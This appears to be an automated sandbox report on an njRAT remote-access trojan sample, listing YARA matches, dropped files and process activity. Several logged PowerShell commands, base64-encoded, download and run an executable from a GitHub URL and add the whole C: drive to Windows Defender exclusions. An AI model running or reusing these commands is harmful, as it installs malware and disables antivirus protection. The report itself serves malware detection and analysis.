Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AQQBuAG8AbgBBAG0AMAAzADYAOQAvAGEAbQAvAHIAYQB3AC8AcgBlAGYAcwAvAGgAZQBhAGQAcwAvAG0AYQBpAG4ALwBSAHUAbgB0AGkAbQBlAEIAcgBvAGsAZQByAC4AZQB4AGUAIgANAAoAJABvAHUAdABwAHUAdAAgAD0AIAAiACQAZQBuAHYAOgBUAGUAbQBwAC8AUgB1AG4AdABpAG0AZQBCAHIAbwBrAGUAcgAuAGUAeABlACIADQAKAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBsACAALQBPAHUAdABGAGkAbABlACAAJABvAHUAdABwAHUAdAANAAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAJABvAHUAdABwAHUAdAA=
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AQQBuAG8AbgBBAG0AMAAzADYAOQAvAGEAbQAvAHIAYQB3AC8AcgBlAGYAcwAvAGgAZQBhAGQAcwAvAG0AYQBpAG4ALwBSAHUAbgB0AGkAbQBlAEIAcgBvAGsAZQByAC4AZQB4AGUAIgANAAoAJABvAHUAdABwAHUAdAAgAD0AIAAiACQAZQBuAHYAOgBUAGUAbQBwAC8AUgB1AG4AdABpAG0AZQBCAHIAbwBrAGUAcgAuAGUAeABlACIADQAKAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBsACAALQBPAHUAdABGAGkAbABlACAAJABvAHUAdABwAHUAdAANAAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAJABvAHUAdABwAHUAdAA=			Jump to behavior

Yara detected Njrat

Source: Yara match	File source: virus.exe.bin.exe, type: SAMPLE
Source: Yara match	File source: 11.2.final.exe.3758448.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Hyra.exe.12ababba.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.final.exe.133459a2.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.Payload.exe.2a6fef8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.Payload.exe.470000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.final.exe.3758448.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.final.exe.133459a2.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.Payload.exe.2a6fef8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.virus.exe.bin.exe.1356599f.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Hyra.exe.12ababba.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.virus.exe.bin.exe.1356abb7.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Hyra.exe.12ab59a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Hyra.exe.12ac83ca.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.virus.exe.bin.exe.13560788.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000000.1505405429.0000000000472000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1629517817.0000000013345000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3915823242.0000000002681000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1457358254.0000000013560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1598765313.000000000337B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.1646811109.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1558924287.0000000012AB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: virus.exe.bin.exe PID: 752, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Hyra.exe PID: 1952, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: final.exe PID: 3320, type: MEMORYSTR
Source: Yara match	File source: C:\ClickMe.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe, type: DROPPED

Operating System Destruction

Protects its processes via BreakOnTermination flag

Source: C:\Users\user\AppData\Roaming\dllhost.exe

Process information set: 01 00 00 00

System Summary

Malicious sample detected (through community Yara rule)

Source: virus.exe.bin.exe, type: SAMPLE	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: virus.exe.bin.exe, type: SAMPLE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: virus.exe.bin.exe, type: SAMPLE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: virus.exe.bin.exe, type: SAMPLE	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 11.2.final.exe.3758448.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 11.2.final.exe.3758448.0.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 11.2.final.exe.3758448.0.unpack, type: UNPACKEDPE	Matched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
Source: 11.2.final.exe.3758448.0.unpack, type: UNPACKEDPE	Matched rule: Detects njRAT based on some strings Author: Sekoia.io
Source: 11.2.final.exe.3758448.0.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 11.2.final.exe.3758448.0.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 11.2.final.exe.3758448.0.unpack, type: UNPACKEDPE	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 2.2.Hyra.exe.12ababba.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 2.2.Hyra.exe.12ababba.2.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 2.2.Hyra.exe.12ababba.2.unpack, type: UNPACKEDPE	Matched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
Source: 2.2.Hyra.exe.12ababba.2.unpack, type: UNPACKEDPE	Matched rule: Detects njRAT based on some strings Author: Sekoia.io
Source: 2.2.Hyra.exe.12ababba.2.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 2.2.Hyra.exe.12ababba.2.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.Hyra.exe.12ababba.2.unpack, type: UNPACKEDPE	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 11.2.final.exe.133459a2.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 11.2.final.exe.133459a2.3.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 11.2.final.exe.133459a2.3.unpack, type: UNPACKEDPE	Matched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
Source: 11.2.final.exe.133459a2.3.unpack, type: UNPACKEDPE	Matched rule: Detects njRAT based on some strings Author: Sekoia.io
Source: 11.2.final.exe.133459a2.3.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 11.2.final.exe.133459a2.3.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 11.2.final.exe.133459a2.3.unpack, type: UNPACKEDPE	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 15.2.Payload.exe.2a6fef8.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 15.2.Payload.exe.2a6fef8.0.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 15.2.Payload.exe.2a6fef8.0.unpack, type: UNPACKEDPE	Matched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
Source: 15.2.Payload.exe.2a6fef8.0.unpack, type: UNPACKEDPE	Matched rule: Detects njRAT based on some strings Author: Sekoia.io
Source: 15.2.Payload.exe.2a6fef8.0.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 15.2.Payload.exe.2a6fef8.0.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 15.2.Payload.exe.2a6fef8.0.unpack, type: UNPACKEDPE	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 15.0.Payload.exe.470000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 15.0.Payload.exe.470000.0.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 15.0.Payload.exe.470000.0.unpack, type: UNPACKEDPE	Matched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
Source: 15.0.Payload.exe.470000.0.unpack, type: UNPACKEDPE	Matched rule: Detects njRAT based on some strings Author: Sekoia.io
Source: 15.0.Payload.exe.470000.0.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 15.0.Payload.exe.470000.0.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 15.0.Payload.exe.470000.0.unpack, type: UNPACKEDPE	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 11.2.final.exe.3758448.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 11.2.final.exe.3758448.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
Source: 11.2.final.exe.3758448.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects njRAT based on some strings Author: Sekoia.io
Source: 11.2.final.exe.3758448.0.raw.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 11.2.final.exe.3758448.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 11.2.final.exe.3758448.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 11.2.final.exe.133459a2.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 11.2.final.exe.133459a2.3.raw.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 11.2.final.exe.133459a2.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 11.2.final.exe.133459a2.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 15.2.Payload.exe.2a6fef8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 15.2.Payload.exe.2a6fef8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 15.2.Payload.exe.2a6fef8.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 15.2.Payload.exe.2a6fef8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 0.2.virus.exe.bin.exe.1356599f.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 0.2.virus.exe.bin.exe.1356599f.1.raw.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0.2.virus.exe.bin.exe.1356599f.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.virus.exe.bin.exe.1356599f.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 2.2.Hyra.exe.12ababba.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 2.2.Hyra.exe.12ababba.2.raw.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 2.2.Hyra.exe.12ababba.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.Hyra.exe.12ababba.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 0.2.virus.exe.bin.exe.1356abb7.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 0.2.virus.exe.bin.exe.1356abb7.2.raw.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0.2.virus.exe.bin.exe.1356abb7.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.virus.exe.bin.exe.1356abb7.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 2.2.Hyra.exe.12ab59a0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 2.2.Hyra.exe.12ab59a0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 2.2.Hyra.exe.12ab59a0.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.Hyra.exe.12ab59a0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 2.2.Hyra.exe.12ac83ca.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 2.2.Hyra.exe.12ac83ca.3.raw.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 2.2.Hyra.exe.12ac83ca.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.Hyra.exe.12ac83ca.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 0.2.virus.exe.bin.exe.13560788.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 0.2.virus.exe.bin.exe.13560788.3.raw.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0.2.virus.exe.bin.exe.13560788.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.virus.exe.bin.exe.13560788.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 0000000F.00000000.1505405429.0000000000472000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 0000000F.00000000.1505405429.0000000000472000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0000000F.00000000.1505405429.0000000000472000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.1629517817.0000000013345000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 0000000B.00000002.1629517817.0000000013345000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0000000B.00000002.1629517817.0000000013345000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.1619630469.0000000000BFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 0000000F.00000002.1619630469.0000000000BFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0000000F.00000002.1619630469.0000000000BFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1457358254.0000000013560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 00000000.00000002.1457358254.0000000013560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000000.00000002.1457358254.0000000013560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.1598765313.000000000337B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 0000000B.00000002.1598765313.000000000337B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0000000B.00000002.1598765313.000000000337B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.1646811109.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 0000000F.00000002.1646811109.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0000000F.00000002.1646811109.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.1558924287.0000000012AB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 00000002.00000002.1558924287.0000000012AB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000002.00000002.1558924287.0000000012AB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: C:\ClickMe.exe, type: DROPPED	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: C:\ClickMe.exe, type: DROPPED	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: C:\ClickMe.exe, type: DROPPED	Matched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
Source: C:\ClickMe.exe, type: DROPPED	Matched rule: Detects njRAT based on some strings Author: Sekoia.io
Source: C:\ClickMe.exe, type: DROPPED	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: C:\ClickMe.exe, type: DROPPED	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: C:\ClickMe.exe, type: DROPPED	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe, type: DROPPED	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe, type: DROPPED	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe, type: DROPPED	Matched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe, type: DROPPED	Matched rule: Detects njRAT based on some strings Author: Sekoia.io
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe, type: DROPPED	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe, type: DROPPED	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe, type: DROPPED	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED	Matched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED	Matched rule: Detects njRAT based on some strings Author: Sekoia.io
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED	Matched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED	Matched rule: Detects njRAT based on some strings Author: Sekoia.io
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe, type: DROPPED	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe, type: DROPPED	Matched rule: Detects njRAT based on some strings Author: Sekoia.io
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe, type: DROPPED	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe, type: DROPPED	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe, type: DROPPED	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe, type: DROPPED	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe, type: DROPPED	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe, type: DROPPED	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe, type: DROPPED	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe	COM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}			Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}			Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgBDADoAXAANAAoA
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cgBlAGcAIABhAGQAZAAgACIASABLAEwATQBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAEUAeABjAGwAdQBzAGkAbwBuAHMAXABQAGEAdABoAHMAIgAgAC8AdgAgAEMAOgBcAA==
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AQQBuAG8AbgBBAG0AMAAzADYAOQAvAGEAbQAvAHIAYQB3AC8AcgBlAGYAcwAvAGgAZQBhAGQAcwAvAG0AYQBpAG4ALwBSAHUAbgB0AGkAbQBlAEIAcgBvAGsAZQByAC4AZQB4AGUAIgANAAoAJABvAHUAdABwAHUAdAAgAD0AIAAiACQAZQBuAHYAOgBUAGUAbQBwAC8AUgB1AG4AdABpAG0AZQBCAHIAbwBrAGUAcgAuAGUAeABlACIADQAKAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBsACAALQBPAHUAdABGAGkAbABlACAAJABvAHUAdABwAHUAdAANAAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAJABvAHUAdABwAHUAdAA=
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgBDADoAXAANAAoA	Jump to behavior
